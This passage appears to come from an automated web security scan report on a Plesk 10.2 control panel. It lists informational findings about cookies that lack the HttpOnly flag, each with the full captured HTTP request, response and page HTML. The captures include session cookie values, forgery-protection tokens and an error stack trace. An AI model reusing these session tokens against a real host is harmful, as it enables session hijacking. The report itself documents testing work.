           if (document.getElementById) {
               var el = document.getElementById("bid-unhandlederror-showinfo");
               if (el) {
                   el.className = "hiddenElement";
               }
               var el = document.getElementById("bid-unhandlederror-hideinfo");
               if (el) {
                   el.className = "commonButton";
               var el = document.getElementById("errorArea");
               if (el) {
                   el.className = "formArea";
               }
               }
           }
           return false;
       }
       function hideinfo_oC(f)
       {
           if (document.getElementById) {
               var el = document.getElementById("bid-unhandlederror-hideinfo");
               if (el) {
                   el.className = "hiddenElement";
               }
               var el = document.getElementById("bid-unhandlederror-showinfo");
               if (el) {
                   el.className = "commonButton";
               }
               var el = document.getElementById("errorArea");
               if (el) {
                   el.className = "hiddenElement";
               }
           }
           return false;
       }
       function submitticket_oC(f)
       {
           f.cmd.value="submitticket";
           f.submit();
           return false;
       }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/view/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <style>
.hiddenElement {
display: none;
}
</style>

<div class="formArea">

<div><img src="/skins/default/plesk/icons/off.gif" width="16" height="16" align="absmiddle">&nbsp;The operation you were performing failed. You can retry the operation with or without changing its parameters. You may also want to report this problem to our support so that we could help you as soon as possible.</div>
<div class="formButtons">
   <table width="100%" cellspacing="0" cellpadding="0"><tr>
       <td align="left" width="0"><DIV class="commonButton" id="bid-unhandlederror-showinfo" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to view detailed information on the error.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return showinfo_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_unhandlederror_showinfo" id="buttonid-unhandlederror-showinfo" type="button" onClick="Event.stop(event);return showinfo_oC(document.forms[0]);return false;">Show Details</BUTTON><SPAN id="spanid-unhandlederror-showinfo">Show Details</SPAN></DIV><DIV class="commonButton" id="bid-unhandlederror-hideinfo" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide additional information on the error.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return hideinfo_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_unhandlederror_hideinfo" id="buttonid-unhandlederror-hideinfo" type="button" onClick="Event.stop(event);return hideinfo_oC(document.forms[0]);return false;">Hide Details</BUTTON><SPAN id="spanid-unhandlederror-hideinfo">Hide Details</SPAN></DIV></td>
       <td class="misc" width="0"><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/hosting/file-manager/&#039;); return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/hosting/file-manager/&#039;); return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN></DIV></td>
   </tr></table>
</div>


</div>
<div class="hiddenElement" id="errorArea">
<br>Additional Information<br><br>
   <textarea rows=20 name="description" readonly>
FileList::init() failed: ls_files_wrapper() failed: Unable to connect to pipe \\.\pipe\PSA_pipe &#123;110D2F0F-F073-4021-AB73-C7886FB9BD1E&#125;
---------------------- Debug Info -------------------------------
0: FileManagerUIPointer.php:726
   FileManagerUIPointer-&gt;accessItem(string &#039;GET&#039;, NULL null)
1: UIPointer.php:600
   UIPointer-&gt;access(string &#039;GET&#039;)
2: plesk.php:47
   </textarea>
</div>





</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.28. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/ftp-users/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/ftp-users/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/ftp-users/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/view
Cookie: locale=en-US; psaContext=dashboard; PLESKSESSID=d92187f07d1a80c8d90db119609cd480

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 21:12:55 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 21:12:54 GMT
Connection: close
Content-Length: 22979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="ac96ec24fae152c446439f0afde39de7" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Management of additional FTP accounts under the domain <span class="name">nosedivesailing.com</span></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.hosting.ftp-users/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>

<div id="screenTabs"><div id="tabs"><ul><li class="first" id="current"><A href="/plesk/client@2/domain@1/hosting/ftp-users/" onClick=";lon();" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create additional FTP accounts for domain vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();"><span>Additional FTP Accounts</span></a></li><li class="last"><A href="/plesk/client@2/domain@1/hosting/anonymous-ftp/" onClick=";lon();" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Set up anonymous FTP on domain vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();"><span>Anonymous FTP</span></a></li></ul></div></div>
<form action="/plesk/client@2/domain@1/hosting/ftp-users/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="ac96ec24fae152c446439f0afde39de7">
   <input type="hidden" name="cmd" value="setFilter">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-ftp-user-add" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create an additional FTP account.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/hosting/ftp-users/ftp-user@new/properties/&#039;); return false;" style=""><BUTTON name="bname_ftp-user-add" id="buttonid-ftp-user-add" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/hosting/ftp-users/ftp-user@new/properties/&#039;); return false;">Create Additional FTP Account</BUTTON><SPAN id="spanid-ftp-user-add">Create Additional FTP Account</SPAN></DIV>
       </div>

   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>FTP accounts</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div id="FtpUsersListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><SPAN class="commonButton" id="bid-remove-selected-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Domain vulnerable.host.fqdn does not have any additional FTP accounts.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_remove_selected" disabled id="buttonid-remove-selected-disabled" type="button">Remove</BUTTON><SPAN id="spanid-remove-selected-disabled">Remove</SPAN></SPAN></div></td><td class="misc"><div id="FtpUsersListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FtpUsersListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FtpUsersListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FtpUsersListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FtpUsersListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find FTP accounts.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FtpUsersListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FtpUsersListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all FTP accounts.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FtpUsersListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FtpUsersListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1 FTP accounts total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FtpUsersListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FtpUsersListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FtpUsersListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FtpUsersListSelectAll" value="true" onClick="FtpUsersListSelect()"></th><th class="icon"><A href="#" onClick="FtpUsersListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort FTP accounts by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="35%" class="sort"><A href="#" onClick="FtpUsersListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort FTP accounts by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="65%"><A href="#" onClick="FtpUsersListSort(&#039;home&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort FTP accounts by home directory.&quot;&#125;]);" onMouseOut="tooltip.hide();">Home</a></th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_hosting_1" value="hosting_1" disabled onClick="FtpUsersListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Domain administrator&#039;s FTP account&quot;&#125;]);" onMouseOut="tooltip.hide();"><IMG src="/skins/default/plesk/icons/ftpsession_domain_user.gif" width="16" height="16" alt="ftpsession_domain_user.gif" title=""></a></td><td><A href="/smb/web/edit" onClick=";lon();">xsscx</a></td><td>/</td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1 FTP accounts total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FtpUsersListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FtpUsersListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FtpUsersListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("ftpuserslist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FtpUsersListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FtpUsersListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FtpUsersListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FtpUsersListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FtpUsersListSelectAll.checked;
                           FtpUsersListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FtpUsersListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FtpUsersListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FtpUsersListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FtpUsersListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FtpUsersListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FtpUsersListSearchShow()
           {
               var sc = document.getElementById("FtpUsersListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FtpUsersListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FtpUsersListSearchHide()
           {
               var sc = document.getElementById("FtpUsersListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FtpUsersListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FtpUsersListRemove(f)
           {
               if (0 == FtpUsersListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/ftp-users/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>
</div>



</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.29. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/hotlink-protection/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/hotlink-protection/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/hotlink-protection/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:13:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:13:47 GMT
Connection: close
Content-Length: 16737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
